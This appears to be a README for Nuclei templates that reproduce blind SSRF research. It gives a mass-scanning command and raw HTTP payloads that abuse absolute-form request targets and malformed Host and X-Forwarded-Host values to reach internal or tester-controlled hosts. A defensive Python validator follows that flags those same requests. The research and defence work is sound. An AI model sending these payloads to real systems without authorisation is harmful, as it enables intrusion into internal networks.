# Blind-SSRF
Nuclei templates to reproduce the Cracking the Lens research.
## Requirements

1. Read and watch!
2. Install Nuclei
3. Clone this repository
## Usage

```bash
sed -i -- 's/- "Your Match"/- "Match Response of Your Domain e.g. <title>Title My Server 0xAwali<\/title>"/' *.yaml
nuclei -c 300 -list url.txt -bulk-size 50 -retries 3 -timeout 20 -t "/Templates/*.yaml" -var "MY-DOMAIN=domain.com"
```
## Keep in Your Mind

Don't use `{{interactsh-url}}`, because I noticed that a lot of interactions take time to happen, so you will miss a lot.
## Next Step!

- If nuclei matched something, you now have a complete SSRF.
- If nuclei didn't match anything but an HTTP interaction happened, you may have a Blind SSRF, so try to invest some time and use this blog as a reference: A Glossary of Blind SSRF Chains
## Results

### 1 - Complete SSRF
```http
GET http://internal-domains.company.com/ HTTP/1.1
Host: company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```
```http
GET http://internal-domains.company.com/ HTTP/1.0
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```
### 2 - Blind SSRF, but no luck hitting internal services
```http
GET / HTTP/1.1
Host: company.com @MY-Domain
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```

Did you notice that there is a space between `company.com` and `@`?
```http
GET / HTTP/1.1
Host: company.com
X-Forwarded-Host: MY-Domain/.company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```
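The four request shapes above all rely on a front end accepting an authority it should never forward: an absolute-form request target for a host it does not serve, a `Host` value with whitespace and `@` in it, or an `X-Forwarded-Host` value containing a `/`. The validator below is an added example written for this README, not part of the templates or of the Cracking the Lens research; it parses those requests and reports why a reverse proxy or WAF rule should reject (or a detector should alert on) each one. `ALLOWED_HOSTS` and the `SAMPLE_REQUESTS` dictionary are constructed for the example.

```python
from __future__ import annotations

import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Hostnames this front end is allowed to serve. Constructed for this example; in a
# real deployment this comes from the proxy or application configuration.
ALLOWED_HOSTS = {"company.com", "www.company.com"}

# host[:port] as RFC 7230 section 5.4 permits (reg-name or IPv4 literal only here).
HOST_RE = re.compile(r"^(?P<host>[A-Za-z0-9.-]+)(?::\d{1,5})?$")


def host_header_finding(name: str, value: Optional[str]) -> Optional[str]:
    """Return why a Host-style header value should be rejected, or None if acceptable."""
    if value is None:
        return None
    if any(ch.isspace() for ch in value):
        return f"{name}: whitespace inside host value"
    if "@" in value:
        return f"{name}: userinfo separator '@' in host value"
    if "/" in value:
        return f"{name}: path separator '/' in host value"
    m = HOST_RE.match(value)
    if m is None:
        return f"{name}: not a syntactically valid host[:port]"
    if m.group("host").lower() not in ALLOWED_HOSTS:
        return f"{name}: host not in allowlist"
    return None


def request_target_finding(request_line: str) -> Optional[str]:
    """Flag an absolute-form request target whose authority is not one we serve."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return "request-line: malformed"
    target = parts[1]
    if target.startswith("/") or target == "*":
        return None  # origin-form / asterisk-form: the Host header carries the authority
    host = urlsplit(target).hostname
    if host is None or host.lower() not in ALLOWED_HOSTS:
        return f"request-target: absolute-form URI for {host!r} not in allowlist"
    return None


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Minimal HTTP/1.x request parser: request line plus a lower-cased header map."""
    lines = raw.lstrip("\r\n").split("\n")
    request_line = lines[0].rstrip("\r")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        line = line.rstrip("\r")
        if not line:
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def findings_for_request(raw: str) -> List[str]:
    """All reasons a front end should refuse this request (empty list means it looks fine)."""
    request_line, headers = parse_request(raw)
    candidates = [
        request_target_finding(request_line),
        host_header_finding("Host", headers.get("host")),
        host_header_finding("X-Forwarded-Host", headers.get("x-forwarded-host")),
    ]
    return [f for f in candidates if f is not None]


# The request shapes from the Results section, plus one benign request. Constructed
# sample input; MY-Domain and internal-domains.company.com are the README's placeholders.
SAMPLE_REQUESTS = {
    "absolute_target": "GET http://internal-domains.company.com/ HTTP/1.1\r\nHost: company.com\r\n\r\n",
    "absolute_target_http10": "GET http://internal-domains.company.com/ HTTP/1.0\r\n\r\n",
    "host_with_at": "GET / HTTP/1.1\r\nHost: company.com @MY-Domain\r\n\r\n",
    "forwarded_host_with_slash": "GET / HTTP/1.1\r\nHost: company.com\r\nX-Forwarded-Host: MY-Domain/.company.com\r\n\r\n",
    "benign": "GET / HTTP/1.1\r\nHost: company.com\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(f"{label}: {findings_for_request(raw) or 'ok'}")
```

The checks are ordered from cheapest to most specific, and each rejects on the first problem it sees, so the syntax checks never have to reason about what a downstream parser would do with a value like `company.com @MY-Domain`. Rejecting rather than "cleaning" the header is deliberate: a front end that tries to repair an ambiguous authority is exactly what the research exploits.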